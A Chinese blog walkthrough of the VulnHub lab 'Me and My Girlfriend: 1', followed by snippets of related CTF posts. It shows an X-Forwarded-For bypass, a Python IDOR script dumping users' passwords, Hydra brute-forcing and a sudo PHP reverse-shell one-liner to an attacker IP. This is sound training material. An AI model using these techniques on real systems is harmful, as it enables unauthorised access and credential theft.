vulnhub靶机之Me and My Girlfriend: 1

0x00 引子

靶机主页:https://www.vulnhub.com/entry/me-and-my-girlfriend-1,409/

先看描述:

这是个菜鸟级的任务,我们的目标是拿到两个flag,在哪儿,不知道。

0x01 主机 & 服务发现

把靶机下载下来在VMware中启动,会自动通过DHCP获取ip地址,先看下当前网络内存活的主机都有哪些:

对比我虚拟机DHCP的IP池可以知道192.168.1.204就是这个靶机(这里就使用最简单的方式确定靶机ip了),然后扫描靶机有哪些开放的端口:

0x02 web服务权限漏洞

发现有个web服务,访问一下:

艾玛,被拒绝了,网页中有提示:

http请求头X-Forwarded-For可用于客户端的地址,使用chrome插件mod header修改一下请求头:

然后再请求,能够看到正常页面了:

在这里点啊点啊点,都点过一遍了,发现有个profile页,能够看到自己的账号密码:

修改地址栏上的user_id参数:

显示了别人的资料,OK,这里可以脱一下库,我新注册的这个账号的user_id是13,说明数据库中最多有13条记录,那么遍历出所有数据:

import requests

from bs4 import BeautifulSoup

if __name__ == ‘__main__‘:
    for user_id in range(1, 13):
        url = ‘http://192.168.1.204/index.php?page=profile&user_id=‘ + str(user_id)
        response = requests.get(url, headers={‘X-Forwarded-For‘: ‘127.0.0.1‘, ‘Cookie‘: ‘PHPSESSID=0c5u4fm64g0vee8ceofuer8m52‘})
        dom = BeautifulSoup(response.content.decode(‘UTF-8‘))

        username = dom.find(‘input‘, id=‘username‘)[‘value‘]
        passwd = dom.find(‘input‘, id=‘password‘)[‘value‘]

        if username:
            print(username + ":" + passwd)

得到:

eweuhtandingan:skuyatuh
aingmaung:qwerty!!!
sundatea:indONEsia
sedihaingmah:cedihhihihi
alice:4lic3
abdikasepak:dorrrrr
aa:aa

0x03 alice账号,Get!

上面脱裤时冒号分割是为了给hydra用,保存为一个文件使用hydra尝试:

alice的账号,Get!!!

进去就是一顿乱瞅,发现一个可疑文件夹,进去看一下:

有两个文件:

这是第一个flag:

这。。。好像有点尴尬。。。

0x04 提权

查看自己可以以root权限执行的命令,发现自己是可以以root权限执行php命令的,而php又是可以执行本地命令的,所以就相当于alice可以执行root命令。

在kali机器上监听一个端口:

nc -lvp 10086

然后靶机上的alice创建一个php反弹shell去连接它:

sudo /usr/bin/php -r ‘$sock=fsockopen("192.168.1.172",10086);exec("/bin/bash -i <&3 >&3 2>&3");‘

返回kali这边已经登录进root了,进去之后照例一顿乱瞅:

找到了第二个flag:

至此,拿到了两个完整的flag,任务完成!

最后吐槽,我发现Alice和Bob的档期真满,哪哪儿都有他俩。。。。

原文地址:https://www.cnblogs.com/cc11001100/p/12203870.html

时间: 2024-10-12 19:01:54

vulnhub靶机之Me and My Girlfriend: 1的相关文章

解决Vulnhub靶机分配不到IP问题

没法找到他的 ip,可能是网卡配置问题 (之前打开 .ova 文件默认联网方式是桥接,改成NAT) 在开机选择的时候,摁 e 编辑一下 把 ro 改成 rw single init=/bin/bash ?? 然后 ctrl+x,就可以输入东西了 ip a 查看一下实际用的是哪一个网卡 vim /etc/network/interfaces 看一下配置信息用的是哪一个网卡 把这俩都改成 ens33,然后 /etc/init.d/networking restart 重启网卡服务 ps.我是直接关了

vulnhub之SP:Harrison靶机

原文地址:https://www.cnblogs.com/heguoze/p/12034411.html

FourAndSix: 2.01靶机入侵

0x01 前言 FourAndSix2是易受攻击的一个靶机,主要任务是通过入侵进入到目标靶机系统然后提权,并在root目录中并读取flag.tx信息 FourAndSix2.镜像下载地址: https://download.vulnhub.com/fourandsix/FourAndSix2.ova 0x02 信息收集 1.存活主机扫描 arp-scan -l 发现192.168.1.9是目标靶机系统 2.端口探测 使用Nmap对靶机进行扫描 nmap -A 192.168.1.9 查询到开放的

Sunset: Nightfall Vulnhub Walkthrough

靶机链接: https://www.vulnhub.com/entry/sunset-nightfall,355/ 主机扫描: ╰─ nmap -p- -A 10.10.202.162Starting Nmap 7.70 ( https://nmap.org ) at 2019-09-09 14:23 CSTNmap scan report for 10.10.202.162Host is up (0.0013s latency).Not shown: 65529 closed portsPOR

vulnhub攻略

https://www.vulnhub.com/entry/21ltr-scene-1,3/ 这个靶机国内https://www.cnblogs.com/hack404/p/11423228.html这个大佬有做过 首先他的ip是192.168.2.120,这个很重要,自己配置一下环境,搞了半天ip都不同 有几个坑点,当用telnet链接10001端口时,会提示链接重置,然后看了国外小哥 使用while true; do nc -v 192.168.2.120 10001 && break

HA: Chakravyuh Vulnhub Walkthrough

靶机链接: https://www.vulnhub.com/entry/ha-chakravyuh,388/ 主机探测扫描: 端口扫描: ╰─ nmap -p- -sC -sV 10.10.202.131 FTP 匿名访问 下载压缩文件,解压缩需要密码,基本套路一直,需要密码,接下来就是找解压密码的事情了 目录枚举下 phpmyadmin 尝试弱口令密码爆破未果 phpmyadmin 版本为4.6.6 无RCE之类的漏洞 那么尝试爆破下载的7z格式的压缩包文件 这里使用的工具: https://

Happycorp:1 Vulnhub Walkthrough

靶机链接: https://www.vulnhub.com/entry/happycorp-1,296/ 网络主机扫描::: 主机端口扫描: NFS文件系统,尝试挂载试试 mount -t nfs 10.10.202.135:/home/karl /mnt 提示没权限打开.这里暂时放一放,看看HTTP方面,有个admin.php后台能不能上传,拿shell web页面收集用户信息: heather 提示密码错误carolyn 账户不存在rodney  账户不存在jennifer 账户不存在 存在

HA: Chanakya Vulnhub Walkthrough

靶机链接: https://www.vulnhub.com/entry/ha-chanakya,395/ 网络主机探测: 主机端口扫描: nmap -p- -sC -sV 10.10.202.136 FTP 有认证 HTTP目录枚举(dirb和dirsearch 多种工具使用枚举) dirb http://10.10.202.136 -X .php,.txt,.html,.xml,.yml,.json ---- Scanning URL: http://10.10.202.136/ ----+

HA: Dhanush Vulnhub Walkthrough

靶机下载链接: https://www.vulnhub.com/entry/ha-dhanush,396/ 主机扫描: 主机端口扫描: HTTP目录爬取 使用dirb dirsearch 爬取均未发现可利用的目录 另外看到ssh端口开启了,进行网页爬取字典生成进行爆破 cewl http://10.10.202.147 -w dict.txt ╰─ hydra -L dict.txt 10.10.202.147 ssh -s 65345 -e nsr 尝试复制passwd文件提示无权限,用户sa